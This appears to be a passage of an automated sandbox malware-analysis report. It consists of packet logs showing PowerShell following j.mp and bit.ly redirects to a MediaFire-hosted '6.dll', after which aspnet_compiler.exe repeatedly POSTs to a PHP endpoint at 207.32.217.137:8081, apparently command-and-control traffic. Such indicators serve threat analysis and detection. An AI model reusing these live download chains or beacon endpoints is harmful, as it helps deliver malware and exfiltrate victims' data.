                                                                                                                                                                      Jan 14, 2022 12:21:11.825705051 CET44349829199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.825778008 CET44349829199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.825795889 CET49829443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.825809956 CET44349829199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.825870037 CET49829443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.825943947 CET44349829199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.826009989 CET49829443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.826010942 CET44349829199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.826026917 CET44349829199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.826069117 CET49829443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.826128006 CET44349829199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.826163054 CET44349829199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.826189041 CET49829443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.826195955 CET44349829199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.826220989 CET49829443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.826245070 CET44349829199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.826287031 CET49829443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.830039024 CET49829443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.838411093 CET49829443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:11.959609985 CET49829443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:16.743422031 CET4977680192.168.2.367.199.248.17
                                                                                                                                                                      Jan 14, 2022 12:21:16.743756056 CET4977880192.168.2.367.199.248.11
                                                                                                                                                                      Jan 14, 2022 12:21:17.439834118 CET49834443192.168.2.3142.250.186.129
                                                                                                                                                                      Jan 14, 2022 12:21:17.439893007 CET44349834142.250.186.129192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.440159082 CET49834443192.168.2.3142.250.186.129
                                                                                                                                                                      Jan 14, 2022 12:21:17.450661898 CET49834443192.168.2.3142.250.186.129
                                                                                                                                                                      Jan 14, 2022 12:21:17.450685978 CET44349834142.250.186.129192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.496480942 CET44349834142.250.186.129192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.496896982 CET49834443192.168.2.3142.250.186.129
                                                                                                                                                                      Jan 14, 2022 12:21:17.497433901 CET44349834142.250.186.129192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.498562098 CET49834443192.168.2.3142.250.186.129
                                                                                                                                                                      Jan 14, 2022 12:21:17.503140926 CET49834443192.168.2.3142.250.186.129
                                                                                                                                                                      Jan 14, 2022 12:21:17.503154993 CET44349834142.250.186.129192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.503568888 CET44349834142.250.186.129192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.523860931 CET49834443192.168.2.3142.250.186.129
                                                                                                                                                                      Jan 14, 2022 12:21:17.565865993 CET44349834142.250.186.129192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.717894077 CET44349834142.250.186.129192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.717955112 CET44349834142.250.186.129192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.718122005 CET49834443192.168.2.3142.250.186.129
                                                                                                                                                                      Jan 14, 2022 12:21:17.719047070 CET49834443192.168.2.3142.250.186.129
                                                                                                                                                                      Jan 14, 2022 12:21:17.754887104 CET49835443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:21:17.754923105 CET44349835104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.755137920 CET49835443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:21:17.755475044 CET49835443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:21:17.755486012 CET44349835104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.798722982 CET44349835104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.798914909 CET49835443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:21:17.801685095 CET49835443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:21:17.801700115 CET44349835104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.802014112 CET44349835104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.803585052 CET49835443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:21:17.849891901 CET44349835104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:18.537094116 CET44349835104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:18.537153959 CET44349835104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:18.537254095 CET49835443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:21:18.538857937 CET49835443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:21:18.567737103 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:18.567779064 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:18.567873955 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:18.568202019 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:18.568236113 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:18.851279974 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:18.851412058 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:18.854114056 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.787837982 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.843622923 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.852375031 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.872648954 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.872708082 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.872847080 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.872875929 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.872894049 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.872936010 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.884841919 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.884885073 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.884946108 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.884970903 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.884984970 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.885034084 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.887898922 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.887942076 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888020039 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888041973 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888058901 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888087988 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888304949 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888353109 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888386965 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888406038 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888461113 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888480902 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888793945 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888832092 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888881922 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888900995 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888923883 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888933897 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888973951 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888983965 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.888998032 CET44349836199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.889062881 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:19.895836115 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:20.043685913 CET49836443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:34.826935053 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:34.989569902 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:34.989718914 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:34.991374016 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:35.154923916 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:35.157118082 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:35.371607065 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:36.195101976 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:36.251019001 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:36.485162020 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:36.649009943 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:36.649647951 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:36.803013086 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:36.856005907 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:36.970088005 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:36.970211983 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:36.970643044 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:37.140429974 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:37.141021013 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:37.360268116 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:37.366311073 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:37.367117882 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:37.532186031 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:37.532694101 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:37.746696949 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:37.779139996 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:37.788479090 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:37.957154989 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:37.957532883 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:38.173455000 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:38.251178026 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:38.251667976 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:38.415117025 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:38.415546894 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:38.621829033 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:38.682542086 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:38.683393002 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:38.852834940 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:38.853272915 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:39.046580076 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:39.047854900 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:39.063540936 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:39.210978985 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:39.211668015 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:39.418416977 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:39.591142893 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:39.592585087 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:39.761466980 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:39.795674086 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:39.940015078 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:39.985575914 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:39.986772060 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:40.016408920 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:40.149746895 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:40.150202036 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:40.356177092 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:40.521028042 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:40.533013105 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:40.701553106 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:40.701920033 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:40.768908024 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:40.769465923 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:40.922749996 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:40.932802916 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:40.985654116 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:41.396595955 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:41.432369947 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:41.456486940 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:41.605925083 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:41.625252962 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:41.625610113 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:41.845177889 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:42.142028093 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:42.145461082 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:42.309094906 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:42.353898048 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:42.360759020 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:42.407661915 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:42.714378119 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:42.731497049 CET498398081192.168.2.3207.32.217.137

                                                                                                                                                                      UDP Packets


                                                                                                                                                                      DNS Queries


                                                                                                                                                                      DNS Answers


HTTP Request Dependency Graph

• www.mediafire.com
• download2262.mediafire.com
• p6tbbb.blogspot.com
• p26ynn.blogspot.com
• 5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com
• www.j.mp
• bit.ly
• 207.32.217.137:8081

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49780 | 104.16.202.237 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49784 | 199.91.155.3 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49776 | 67.199.248.17 | 80 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 12:20:22.301415920 CET | 2085 | OUT | GET /asasdjiasjdiasjasdasddik HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: www.j.mp
Connection: Keep-Alive
Jan 14, 2022 12:20:22.405754089 CET | 2096 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Fri, 14 Jan 2022 11:20:22 GMT
Content-Type: text/html
Content-Length: 178
Location: http://bit.ly/asasdjiasjdiasjasdasddik
Via: 1.1 google
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49778 | 67.199.248.11 | 80 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 12:20:22.456866980 CET | 2097 | OUT | GET /asasdjiasjdiasjasdasddik HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: bit.ly
Connection: Keep-Alive
Jan 14, 2022 12:20:22.572482109 CET | 2100 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Fri, 14 Jan 2022 11:20:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 144
Cache-Control: private, max-age=90
Location: https://www.mediafire.com/file/nm9ysba5ejf20r8/6.dll/file
Set-Cookie: _bit=m0ebkm-37b6939199dc18fdfa-00h; Domain=bit.ly; Expires=Wed, 13 Jul 2022 11:20:22 GMT
Via: 1.1 google
Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://www.mediafire.com/file/nm9ysba5ejf20r8/6.dll/file">moved here</a></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49838 | 207.32.217.137 | 8081 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 12:21:34.991374016 CET | 12546 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 282
Expect: 100-continue
Connection: Keep-Alive
Jan 14, 2022 12:21:35.154923916 CET | 12546 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:36.195101976 CET | 12547 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:35 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:36.485162020 CET | 12547 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 282
Expect: 100-continue
Jan 14, 2022 12:21:36.649009943 CET | 12547 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:37.366311073 CET | 12549 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:36 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:37.367117882 CET | 12549 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 284
Expect: 100-continue
Jan 14, 2022 12:21:37.532186031 CET | 12549 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:38.251178026 CET | 12551 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:37 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:38.251667976 CET | 12551 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 282
Expect: 100-continue
Jan 14, 2022 12:21:38.415117025 CET | 12551 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:39.046580076 CET | 12553 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:38 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:39.047854900 CET | 12553 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 284
Expect: 100-continue
Jan 14, 2022 12:21:39.210978985 CET | 12553 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:39.940015078 CET | 12555 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:39 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:39.986772060 CET | 12555 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 282
Expect: 100-continue
Jan 14, 2022 12:21:40.149746895 CET | 12555 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:40.768908024 CET | 12557 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:40 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:40.769465923 CET | 12557 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/x-www-form-urlencoded
Host: 207.32.217.137:8081
Content-Length: 284
Expect: 100-continue
Jan 14, 2022 12:21:40.932802916 CET | 12557 | IN | HTTP/1.1 100 Continue
Jan 14, 2022 12:21:42.142028093 CET | 12559 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 11:21:40 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Jan 14, 2022 12:21:42.145461082 CET | 12559 | OUT | POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 284
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:42.309094906 CET12559INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:43.440045118 CET12561INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:42 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:43.440301895 CET12561OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:43.604161978 CET12561INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:44.233500957 CET12563INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:43 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:44.233944893 CET12563OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:44.396948099 CET12563INHTTP/1.1 100 Continue
